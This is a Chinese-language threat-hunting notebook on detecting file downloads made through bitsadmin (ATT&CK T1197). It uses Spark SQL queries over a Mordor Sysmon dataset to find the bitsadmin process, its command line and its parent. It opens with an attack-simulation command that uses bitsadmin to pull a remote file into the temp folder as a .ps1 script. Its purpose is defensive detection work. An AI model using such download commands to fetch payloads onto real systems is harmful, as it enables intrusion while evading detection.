# 使用Bitsadmin绕过下载文件（Bitsadmin Download Malicious File）

## 概述

| 编写作者 | 攻击矩阵 | 创建时间 | 修改时间 |
| ---- | ---- | ---- | ---- |
| G4rb3n | T1197 | 2021-4-9 | 2021-4-9 |

## 攻击场景

黑客通过Bitsadmin绕过检测下载恶意文件。

## 攻击模拟

In [ ]:
bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\bitsadmin1_flag.ps1

DISPLAY: '/Download' TYPE: DOWNLOAD STATE: TRANSFERRED
PRIORITY: FOREGROUND FILES: 1 / 1 BYTES: 6886 / 6886 (100%)
Transfer complete.

## 威胁狩猎

### 狩猎原理

监控 bitsadmin.exe 进程创建。

### 初始化分析引擎

In [1]:
from openhunt.mordorutils import *
spark = get_spark()

### 下载&加载Mordor日志集

In [2]:
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/defense_evasion/host/cmd_bitsadmin_download_psh_script.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")

[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 


### 日志集统计

In [3]:
df = spark.sql(
'''
SELECT Hostname, Channel, EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname, Channel, EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)

+------------+------------------------------------+-------+-----+
|Hostname    |Channel                             |EventID|count|
+------------+------------------------------------+-------+-----+
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|7      |141  |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|10     |96   |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|12     |55   |
|WORKSTATION5|Security                            |4658   |16   |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|13     |15   |
|WORKSTATION5|Security                            |5156   |12   |
|WORKSTATION5|Security                            |4703   |11   |
|WORKSTATION5|Security                            |4656   |11   |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|3      |8    |
|WORKSTATION5|Security                            |4663   |8    |
|WORKSTATION5|Security                            |4690   |8    |
|WORKSTATION5|Security                            |5158   |6    |
|WORKSTATI

### 使用规则匹配攻击事件

### 规则 I

| 日志类型 | 日志来源 | 行为场景 | 事件ID |
| ---- | ---- | ---- | ---- |
| Process | sysmon | 进程创建 | 1 |
| Process | security | 进程创建 | 4688 |

筛选进程创建的事件。

In [4]:
df = spark.sql(
'''
SELECT `@timestamp`, EventID, Image
FROM mordorTable
WHERE Channel = 'Microsoft-Windows-Sysmon/Operational'
  AND EventID = 1
'''
)
df.show(10, False)

+------------------------+-------+---------------------------------+
|@timestamp              |EventID|Image                            |
+------------------------+-------+---------------------------------+
|2020-10-23T02:36:43.547Z|1      |C:\Windows\System32\bitsadmin.exe|
|2020-10-23T02:36:43.590Z|1      |C:\Windows\System32\svchost.exe  |
+------------------------+-------+---------------------------------+



筛选进程名为bitsadmin.exe的命令行。

In [5]:
df = spark.sql(
'''
SELECT `@timestamp`, CommandLine
FROM mordorTable
WHERE Channel = 'Microsoft-Windows-Sysmon/Operational'
  AND EventID = 1
  AND Image LIKE "%bitsadmin.exe"
'''
)
df.show(10, False)

+------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|@timestamp              |CommandLine                                                                                                                                                                                               |
+------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|2020-10-23T02:36:43.547Z|bitsadmin.exe  /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Users\wardog\AppData\Local\Temp\bitsadmin1_flag.ps1|
+------------------------+------------------------------------------------------

筛选bitsadmin的父进程名及父进程命令行。

In [6]:
df = spark.sql(
'''
SELECT `@timestamp`, ParentImage, ParentCommandLine
FROM mordorTable
WHERE Channel = 'Microsoft-Windows-Sysmon/Operational'
  AND EventID = 1
  AND Image LIKE "%bitsadmin.exe"
'''
)
df.show(10, False)

+------------------------+---------------------------+------------------------------+
|@timestamp              |ParentImage                |ParentCommandLine             |
+------------------------+---------------------------+------------------------------+
|2020-10-23T02:36:43.547Z|C:\Windows\System32\cmd.exe|"C:\windows\system32\cmd.exe" |
+------------------------+---------------------------+------------------------------+

